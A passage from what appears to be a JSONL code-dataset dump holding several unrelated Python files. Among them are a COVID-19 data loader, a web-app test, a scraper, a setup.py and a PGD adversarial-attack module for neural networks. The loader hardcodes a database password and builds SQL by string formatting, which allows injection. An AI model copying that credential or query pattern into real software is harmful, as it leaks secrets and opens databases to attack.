"torch.utils.data.DataLoader", "line_number": 108, "usage_type": "call"}, {"api_name": "utils.dataset.ReadDataset", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.dataset.ReadDataset", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 114, "usage_type": "name"}, {"api_name": "model.parameters", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 115, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.SmoothL1Loss", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}]} +{"seq_id": "403049722", "text": "#!/usr/bin/env python3\nimport psycopg2\nimport requests\nfrom datetime import datetime\nimport re\n\npage_size = 2000\naggregation_frequency_max = 100\n\ndef download_data():\n \"\"\"Downloads data from https://services7.arcgis.com and writes them to the DB \"\"\"\n print(\"Let's start ...\")\n i = 0\n while i < aggregation_frequency_max:\n offset = i * page_size\n url = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?f' \\\n '=json&where=1%3D1&outFields=*&resultOffset=' + str(offset)\n r = requests.get(url, allow_redirects=True)\n json_tmp = r.json()\n # open(\"rki_data/\" + str(offset) +'-rki.json', 'wb').write(json_tmp)\n cleaned_columns = cleanup_data(json_tmp[\"features\"])\n if len(cleaned_columns) is 0:\n break\n write_to_table(cleaned_columns)\n i += 1\n\ndef cleanup_data(json_files):\n result = []\n for attributes in json_files:\n # parse age group\n if attributes[\"attributes\"][\"Altersgruppe\"] == 'unbekannt':\n age_group_start = 'null'\n age_group_end = 'null'\n elif attributes[\"attributes\"][\"Altersgruppe\"] == 'A80+':\n age_group_start = '80'\n age_group_end = '99'\n else:\n age_group = re.search('A([0-9]*)-A([0-9]*)', attributes[\"attributes\"][\"Altersgruppe\"], re.IGNORECASE)\n age_group_start = age_group.group(1)\n age_group_end = age_group.group(2)\n\n # parse notification_date\n ts = int(int(attributes[\"attributes\"][\"Meldedatum\"]) / 1000)\n notification_date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d')\n\n item = {\n 'state_id': parse_int(attributes[\"attributes\"][\"IdBundesland\"]),\n 'state': attributes[\"attributes\"][\"Bundesland\"],\n 'sex': attributes[\"attributes\"][\"Geschlecht\"],\n 'province_id': parse_int(attributes[\"attributes\"][\"IdLandkreis\"]),\n 'province': attributes[\"attributes\"][\"Landkreis\"],\n 'object_id': int(attributes[\"attributes\"][\"ObjectId\"]),\n 'notification_date': notification_date,\n 'death_count': int(attributes[\"attributes\"][\"AnzahlTodesfall\"]),\n 'case_count': int(attributes[\"attributes\"][\"AnzahlFall\"]),\n 'age_group_start': age_group_start,\n 'age_group_end': age_group_end\n }\n\n if item[\"state\"] == '-nicht erhoben-':\n item[\"state\"] = \"\"\n\n if item[\"province\"] == '-nicht erhoben-':\n item[\"province\"] = \"\"\n\n result.append(item)\n return result\n\n\ndef parse_int(s):\n try:\n return int(s)\n except ValueError:\n return -1\n\n\ndef write_to_table(content):\n conn = None\n try:\n conn = psycopg2.connect(\"dbname='wirvsvirus' user='wirvsvirus' host='marc-book.de' password='[n2^3kKCyxUGgzuV'\")\n\n cur = conn.cursor()\n\n for item in content:\n query = \"\"\"\n INSERT INTO rki_data_germany (state_id, state, sex, province_id, province, object_id, notification_date, death_count, case_count, age_group_start, age_group_end, extraction_date)\n VALUES\n ({}, '{}', '{}', {}, '{}', {}, date'{}', {}, {}, {}, {}, now())\n \"\"\".format(\n item['state_id'],\n item['state'],\n item['sex'],\n item['province_id'],\n item['province'],\n item['object_id'],\n item['notification_date'],\n item['death_count'],\n item['case_count'],\n item['age_group_start'],\n item['age_group_end']\n )\n\n cur.execute(query)\n\n cur.close()\n conn.commit()\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n\n finally:\n if conn is not None:\n conn.close()\n\n\nif __name__ == '__main__':\n download_data()\n", "sub_path": "fillDatabase/aggregate.py", "file_name": "aggregate.py", "file_ext": "py", "file_size_in_byte": 3978, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "re.search", "line_number": 38, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 80, "usage_type": "call"}, {"api_name": "psycopg2.DatabaseError", "line_number": 108, "usage_type": "attribute"}]} +{"seq_id": "401171447", "text": "from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom webtest import TestApp\n\nimport ruterstop\n\n\nclass WebAppTestCase(TestCase):\n def setUp(self):\n self.app = TestApp(ruterstop.webapp)\n pass\n\n def tearDown(self):\n self.app.reset()\n pass\n\n @patch(\"ruterstop.format_departure_list\", return_value=None)\n @patch(\"ruterstop.get_departures\", return_value=dict(a=\"foo\"))\n def test_calls_api_on_proper_path(self, get_mock, format_mock):\n res = self.app.get(\"/1234\")\n self.assertEqual(res.content_type, \"text/plain\")\n get_mock.assert_called_once_with(stop_id=1234)\n format_mock.assert_called_once_with(dict(a=\"foo\"))\n\n @patch(\"ruterstop.get_departures\", return_value=None)\n def test_simple_404_error(self, mock):\n res = self.app.get(\"/\", expect_errors=True)\n self.assertEqual(res.content_type, \"text/plain\")\n self.assertEqual(res.status_code, 404)\n self.assertEqual(res.body, \"Ugyldig stoppested\".encode())\n self.assertEqual(mock.call_count, 0)\n\n @patch(\"ruterstop.get_departures\", return_value=None)\n def test_simple_500_error(self, mock):\n mock.side_effect = Exception(\"barf voof\")\n\n with self.assertLogs(logger=\"ruterstop\", level=\"ERROR\") as log:\n res = self.app.get(\"/1234\", expect_errors=True)\n self.assertEqual(res.content_type, \"text/plain\")\n self.assertEqual(res.status_code, 500)\n self.assertEqual(res.body, \"Feil på serveren\".encode())\n self.assertEqual(mock.call_count, 1)\n\n self.assertRegex(log.output[0], r\"barf voof\")\n\n @patch(\"ruterstop.format_departure_list\", return_value=None)\n @patch(\"ruterstop.get_departures\", return_value=dict(a=\"foo\"))\n def test_calls_api_with_querystring_params(self, get_mock, format_mock):\n self.app.get(\"/1234?direction=inbound&min_eta=5&bogusargs=1337\")\n get_mock.assert_called_once_with(stop_id=1234)\n format_mock.assert_called_once_with(\n dict(a=\"foo\"), directions=\"inbound\", min_eta=5\n )\n", "sub_path": "ruterstop/tests/test_webapp.py", "file_name": "test_webapp.py", "file_ext": "py", "file_size_in_byte": 2094, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "webtest.TestApp", "line_number": 11, "usage_type": "call"}, {"api_name": "ruterstop.webapp", "line_number": 11, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 34, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 47, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "497984528", "text": "import os\nos.system('clear')\nimport requests\nfrom bs4 import BeautifulSoup\n\n#input = raw_input(\"Voer een zoek term in: \")\n#URL = \"https://www.na-kd.com/nl/lingerie\"\n\nURL = \"https://www.na-kd.com/nl/lingerie?sortBy=price&count=18&p_categories=c_1-32922_nl-nl\"\n\nheaders = {\"User-Agent\": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15'}\n\npage = requests.get(URL, headers=headers )\n\nsoup = BeautifulSoup(page.content, 'html.parser')\ncount = 0\ntitel = soup.find(\"title\").get_text()\nfruits = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"]\nfor x in fruits:\n count +1\n print(count)\n prijs = soup.find(\"span\", itemprop=\"price\")#.get_text()\n print(prijs)\n\nprint(\"\")\nprint(titel)\nprint(\"\")\n", "sub_path": "NA-KD kopie 4.py", "file_name": "NA-KD kopie 4.py", "file_ext": "py", "file_size_in_byte": 741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.system", "line_number": 2, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "144133459", "text": "# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n#\n# Copyright (c) 2010-2014 Mariusz Smenzyk \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"\n\n@author: Mariusz Smenzyk\n@license: MIT License\n@contact: mariusz.smenzyk@sizeof.pl\n\"\"\"\nimport os\nimport re\n\nfrom setuptools import setup, find_packages\n\n\nREQUIREMENTS = [\n 'django-simple-captcha>=0.4.2',\n 'south>=1.0.2',\n 'django>=1.9'\n]\n\nCLASSIFIERS = [\n \"Development Status :: 4 - Beta\",\n \"Environment :: Web Environment\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Framework :: Django\",\n \"License :: OSI Approved :: MIT License\",\n]\n\n\ndef dependency_links(packages):\n auth = '%s:%s@' % (os.environ.get('SIZEOF_PYPI_USER', ''), os.environ.get('SIZEOF_PYPI_PASSWORD', ''))\n pypi = 'http://%spypi.sizeof.pl/simple/' % (auth if len(auth) > 2 else '')\n return ['%s%s' % (pypi, re.search('[\\w+-]*', p).group(0)) for p in packages if p.startswith('sizeof')]\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name='sizeof-django-tellafriend',\n author='SIZEOF.PL | Mariusz Smenżyk',\n author_email='mariusz@sizeof.pl',\n url=\"https://bitbucket.org/sizeof/sizeof-django-tellafriend/\",\n description=\"SIZEOF.PL | Django Tell a Friend\",\n license='MIT',\n keywords=\"django tellafriend recommend\",\n version=__import__('tellafriend').get_version(),\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=REQUIREMENTS,\n dependency_links=dependency_links(REQUIREMENTS),\n long_description=read('README.md'),\n package_data={\n 'tellafriend': [\n 'templates/tellafriend/*.html',\n 'templates/tellafriend/*.txt',\n 'locale/*/LC_MESSAGES/*',\n ],\n },\n)\n", "sub_path": "pypi_install_script/sizeof-django-tellafriend-0.1.3.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 58, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 61, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "151814746", "text": "import torch\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\n\r\n\r\n\r\nclass AttackPGD(nn.Module):\r\n def __init__(self, basic_net, config):\r\n super(AttackPGD, self).__init__()\r\n self.basic_net = basic_net\r\n self.rand = config['random_start']\r\n self.step_size = config['step_size']\r\n self.epsilon = config['epsilon']\r\n self.num_steps = config['num_steps']\r\n assert config['loss_func'] == 'xent', 'Only xent supported for now.'\r\n\r\n def forward(self, inputs, targets, t=None):\r\n x = inputs.detach()\r\n if t is None:\r\n t = inputs.data.new(1).uniform_(0.0,1.0)\r\n if self.rand:\r\n x = x + torch.zeros_like(x).uniform_(-self.epsilon, self.epsilon)\r\n for i in range(self.num_steps):\r\n x.requires_grad_()\r\n with torch.enable_grad():\r\n logits = self.basic_net(x, t=t)\r\n loss = F.cross_entropy(logits, targets, size_average=False)\r\n grad = torch.autograd.grad(loss, [x])[0]\r\n x = x.detach() + self.step_size*torch.sign(grad.detach())\r\n x = torch.min(torch.max(x, inputs - self.epsilon), inputs + self.epsilon)\r\n x = torch.clamp(x, 0, 1)\r\n # t1 = self.basic_net(x, t=t)\r\n # t2 = F.cross_entropy(t1, targets, size_average=False)\r\n return self.basic_net(x, t=t), x", "sub_path": "evasion_attack/AttackPGD.py", "file_name": "AttackPGD.py", "file_ext": "py", "file_size_in_byte": 1381, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.zeros_like", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.enable_grad", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.autograd.grad", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.sign", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "638262939", "text": "import os\n\nif os.environ.get(\"PRODUCTION_SERVER\", 'defaults as false') == \"True\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"formhub.preset.production\")\nelse:\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"formhub.preset.staging\")\n\n# This application object is used by the development server\n# as well as any WSGI server configured to use this file.\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n", "sub_path": "formhub/wsgi.py", "file_name": "wsgi.py", "file_ext": "py", "file_size_in_byte": 453, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ.get", "line_number": 3, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 4, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.core.wsgi.get_wsgi_application", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "408257256", "text": "import numpy as np\nfrom sklearn import datasets, metrics\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import svm\n\ndiabetes = datasets.load_diabetes()\n\nx = diabetes.data[:, np.newaxis, 2]\ny = diabetes.target\n\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2)\n\n\nclf = svm.SVC(kernel='linear')\nclf.fit(x_train, y_train)\n\ny_pred=clf.predict(x_test)\n\nprint(\"accuracy of linear kernel is:\")\nprint(metrics.accuracy_score(y_test,y_pred))\n\nnewclf = svm.SVC(kernel='rbf')\nnewclf.fit(x_train, y_train)\n\ny_pred_new=newclf.predict(x_test)\n\nprint(\"accuracy of RBF kernel is:\")\nprint(metrics.accuracy_score(y_test,y_pred_new))", "sub_path": "Lab3/source/task3.py", "file_name": "task3.py", "file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_diabetes", "line_number": 6, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.newaxis", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 14, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 20, "usage_type": "name"}, {"api_name": "sklearn.svm.SVC", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 22, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "1790550", "text": "from django.shortcuts import render, get_object_or_404\nfrom aikidoleoni.core.forms import ContactForm\nfrom aikidoleoni.core.models import Page\nfrom aikidoleoni.blog.models import Post\n\ndef home(request):\n template = \"core/home.html\"\n page = get_object_or_404(Page, slug='home')\n context = dict(\n page=page,\n posts=Post.published_posts.all()[:3],\n )\n return render(request, template, context)\n\n\ndef contact(request):\n page = get_object_or_404(Page, slug='contato')\n context = dict(\n page=page,\n form = ContactForm()\n )\n template = \"core/contact.html\"\n\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if not form.is_valid():\n context['form'] = form\n return render(request, template, context)\n try:\n if form.send_mail() > 0:\n context['success'] = \"Email enviado com sucesso\"\n except ConnectionRefusedError:\n context['success'] = \"Desculpe, não foi possível enviar sua \\\n mensagem.\"\n\n return render(request, template, context)\n\n\ndef about(request):\n page = get_object_or_404(Page, slug='sobre')\n context = dict(\n page=page,\n )\n template = \"core/about.html\"\n return render(request, template, context)\n\n\ndef about_aikido(request):\n page = get_object_or_404(Page, slug='sobre-o-aikido')\n context = dict(\n page=page,\n )\n template = \"core/about.html\"\n return render(request, template, context)\n\n", "sub_path": "aikidoleoni/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1516, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 8, "usage_type": "call"}, {"api_name": "aikidoleoni.core.models.Page", "line_number": 8, "usage_type": "argument"}, {"api_name": "aikidoleoni.blog.models.Post.published_posts.all", "line_number": 11, "usage_type": "call"}, {"api_name": "aikidoleoni.blog.models.Post.published_posts", "line_number": 11, "usage_type": "attribute"}, {"api_name": "aikidoleoni.blog.models.Post", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 17, "usage_type": "call"}, {"api_name": "aikidoleoni.core.models.Page", "line_number": 17, "usage_type": "argument"}, {"api_name": "aikidoleoni.core.forms.ContactForm", "line_number": 20, "usage_type": "call"}, {"api_name": "aikidoleoni.core.forms.ContactForm", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 40, "usage_type": "call"}, {"api_name": "aikidoleoni.core.models.Page", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 49, "usage_type": "call"}, {"api_name": "aikidoleoni.core.models.Page", "line_number": 49, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "95988008", "text": "import time\r\nfrom openerp.osv import fields, osv\r\nfrom openerp.tools.translate import _\r\nimport logging\r\n_logger = logging.getLogger(__name__)\r\n\r\nclass dincelsale_order_balance_inv(osv.osv_memory):\r\n\t_name = \"dincelsale.order.balance\"\r\n\t_columns = {\r\n\t\t'date': fields.date('Date'),\r\n\t\t'qty':fields.float(\"Qty test\"),\r\n\t\t'comments':fields.char(\"Comments\"),\r\n\t\t'order_id':fields.many2one('sale.order', 'OrderId'),\r\n\t\t'amount':fields.float('Amount Ex Gst'),\r\n\t\t'amount_total':fields.float('Amount Total'),\r\n\t}\r\n\t\t\r\n\tdef on_change_amount(self, cr, uid, ids,_amounttot, context=None):\r\n\t\tamount= float(_amounttot)/1.1\r\n\t\tvals={'amount':amount}\t\r\n\r\n\t\treturn {'value':vals}\r\n\t\t\r\n\tdef button_create_balance1(self, cr, uid, ids, context=None):\r\n\t\tif context is None:\r\n\t\t\tcontext = {}\t\t\t\r\n\t\tfor record in self.browse(cr, uid, ids, context=context):\t\t\r\n\t\t\tif not record.amount or record.amount<=0.0:\r\n\t\t\t\traise osv.except_osv(_('Error!'),_('Invalid amount found!!'))\r\n\t\t\telse:\r\n\t\t\t\tprice_unit\t= record.amount# float(record.amount_total)/1.1\r\n\t\t\t\tobj_inv \t= self.pool.get('account.invoice')\t\r\n\t\t\t\tobj_invline\t= self.pool.get('account.invoice.line')\r\n\t\t\t\tproduct_obj = self.pool.get('product.product')\t\r\n\t\t\t\targs = [(\"x_prod_cat\", \"=\", \"balance1\")]\r\n\t\t\t\t_ids = product_obj.search(cr, uid, args, context=context) \r\n\t\t\t\tif not _ids:\r\n\t\t\t\t\traise osv.except_osv(_('Error!'),_('Balance product not found!!'))\r\n\t\t\t\telse:\r\n\t\t\t\t\tproduct_id\t = _ids[0]\r\n\t\t\t\t\t_obj = product_obj.browse(cr, uid, product_id, context)\r\n\t\t\t\t\tvals = {\r\n\t\t\t\t\t\t'x_sale_order_id': record.order_id.id,\r\n\t\t\t\t\t\t'x_inv_type':'balance',\r\n\t\t\t\t\t\t'origin': record.order_id.name,\r\n\t\t\t\t\t\t'reference': record.order_id.name,\r\n\t\t\t\t\t\t'partner_id': record.order_id.partner_id.id,\r\n\t\t\t\t\t\t'user_id':record.order_id.user_id.id,\r\n\t\t\t\t\t\t#'internal_number': record.name,\r\n\t\t\t\t\t\t'section_id': 1,\r\n\t\t\t\t\t\t'type': 'out_invoice',\r\n\t\t\t\t\t\t'account_id':record.order_id.partner_id.property_account_receivable.id\r\n\t\t\t\t\t\t}\r\n\t\t\t\r\n\t\t\t\t\tvals['date_invoice']=record.date\r\n\t\t\t\t\tvals['date_due']=vals['date_invoice']\r\n\t\t\t\t\t\r\n\t\t\t\t\t \r\n\t\t\t\t\tvals['x_project_id']=record.order_id.x_project_id.id\r\n\t\t\t\t \r\n\t\t\t\t\t_payterm = \tself.pool.get('account.payment.term').search(cr, uid, [('x_payterm_code', '=', 'immediate')], limit=1)\r\n\t\t\t\t\tif _payterm:\r\n\t\t\t\t\t\tvals['payment_term']=_payterm[0]\t\r\n\t\t\t\t\t\r\n\t\t\t\t\tinv_id = obj_inv.create(cr, uid, vals, context=context)\r\n\t\t\t\t\r\n\t\t\t\t\tvals = {\r\n\t\t\t\t\t\t'product_id': product_id,\r\n\t\t\t\t\t\t'quantity': '1',\r\n\t\t\t\t\t\t'invoice_id': inv_id,\r\n\t\t\t\t\t\t'origin': record.order_id.name,\r\n\t\t\t\t\t\t'price_unit': price_unit,\r\n\t\t\t\t\t\t'price_subtotal': price_unit,\r\n\t\t\t\t\t}\r\n\t\t\t\t\tvals['name'] = _obj.name\r\n\t\t\t\t\t \r\n\t\t\t\t\tif _obj.taxes_id:\r\n\t\t\t\t\t\tvals['invoice_line_tax_id'] = [(6, 0, _obj.taxes_id.ids)]\r\n\t\t\t\t \r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\tobj_invline.create(cr, uid, vals, context=context)\r\n\t\t\t\t\t#for taxes\r\n\t\t\t\t\t\r\n\t\t\t\t\tobj_inv = obj_inv.browse(cr, uid, inv_id, context)\r\n\t\t\t\t\tobj_inv.button_compute(True) #For taxes\r\n\t\t\t\t\t\r\n\t\t\t\t \r\n\t\t\t\t\tview_id = self.pool.get('ir.ui.view').search(cr, uid, [('name', '=', 'dincelaccount.invoice.form')], limit=1) \t\r\n\t\t\t\t\t\r\n\t\t\t\t\tvalue = {\r\n\t\t\t\t\t\t'domain': str([('id', 'in', inv_id)]),\r\n\t\t\t\t\t\t'view_type': 'form',\r\n\t\t\t\t\t\t'view_mode': 'form',\r\n\t\t\t\t\t\t'res_model': 'account.invoice',\r\n\t\t\t\t\t\t'view_id': view_id,\r\n\t\t\t\t\t\t'type': 'ir.actions.act_window',\r\n\t\t\t\t\t\t'name' : _('Invoice'),\r\n\t\t\t\t\t\t'res_id': inv_id\r\n\t\t\t\t\t}\r\n\t\t\t\t\treturn value\t\r\n\t\t\t\t\t\r\n\t\t#return True\r\n\t\t\r\n\tdef on_change_qty(self, cr, uid, ids, context=None):\r\n\t\t\r\n\t\t#if context and context.get('active_ids'):\r\n\t\t\t\r\n\t\tvals={}\t\r\n\r\n\t\treturn {'value':vals}\r\n\t\t\r\n\tdef _get_init_qty(self, cr, uid, context=None):\r\n\t\treturn 1\r\n\t\t\r\n\t_defaults = {\r\n\t\t'qty': _get_init_qty,\r\n\t\t'date': lambda *a: time.strftime('%Y-%m-%d'),\r\n\t\t}\r\n\t ", "sub_path": "dincelaccount/wizard/sale_order_balance_inv.py", "file_name": "sale_order_balance_inv.py", "file_ext": "py", "file_size_in_byte": 3705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "openerp.osv.osv.osv_memory", "line_number": 7, "usage_type": "attribute"}, {"api_name": "openerp.osv.osv", "line_number": 7, "usage_type": "name"}, {"api_name": "openerp.osv.fields.date", "line_number": 10, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 10, "usage_type": "name"}, {"api_name": "openerp.osv.fields.float", "line_number": 11, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 11, "usage_type": "name"}, {"api_name": "openerp.osv.fields.char", "line_number": 12, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 12, "usage_type": "name"}, {"api_name": "openerp.osv.fields.many2one", "line_number": 13, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 13, "usage_type": "name"}, {"api_name": "openerp.osv.fields.float", "line_number": 14, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 14, "usage_type": "name"}, {"api_name": "openerp.osv.fields.float", "line_number": 15, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 15, "usage_type": "name"}, {"api_name": "openerp.osv.osv.except_osv", "line_number": 29, "usage_type": "call"}, {"api_name": "openerp.osv.osv", "line_number": 29, "usage_type": "name"}, {"api_name": "openerp.tools.translate._", "line_number": 29, "usage_type": "call"}, {"api_name": "openerp.osv.osv.except_osv", "line_number": 38, "usage_type": "call"}, {"api_name": "openerp.osv.osv", "line_number": 38, "usage_type": "name"}, {"api_name": "openerp.tools.translate._", "line_number": 38, "usage_type": "call"}, {"api_name": "openerp.tools.translate._", "line_number": 97, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "48246118", "text": "from datetime import date\nfrom datetime import datetime\nfrom datetime import time\nfrom datetime import timedelta\nfrom ftw.builder import Builder\nfrom ftw.builder import create\nfrom ftw.builder import session\nfrom opengever.base.model import create_session\nfrom opengever.ogds.base.utils import get_current_admin_unit\nfrom opengever.testing import assets\nfrom opengever.testing import builders # noqa\nfrom plone import api\nimport pytz\n\n\nclass MeetingExampleContentCreator(object):\n \"\"\"Setup SQL example content.\n\n Currently it is not possible to do this with ftw.inflator.\n\n \"\"\"\n tz = pytz.timezone('Europe/Zurich')\n\n def __init__(self, site):\n self.site = site\n self.db_session = create_session()\n self.setup_builders()\n self.committee_law = self.site['sitzungen']['committee-1']\n self.committee_law_model = self.committee_law.load_model()\n\n self.committee_accounting = self.site['sitzungen']['committee-2']\n self.committee_accounting_model = self.committee_accounting.load_model()\n\n self.committee_assembly = self.site['sitzungen']['committee-3']\n self.committee_assembly_model = self.committee_assembly.load_model()\n\n self.committee_evil = self.site['sitzungen']['evil-committee-1']\n self.committee_evil_model = self.committee_evil.load_model()\n\n self.dossier_taxes_1 = self.site.restrictedTraverse(\n 'ordnungssystem/ressourcen-und-support/finanzen/planung/finanzplanung/dossier-5')\n self.dossier_taxes_2 = self.site.restrictedTraverse(\n 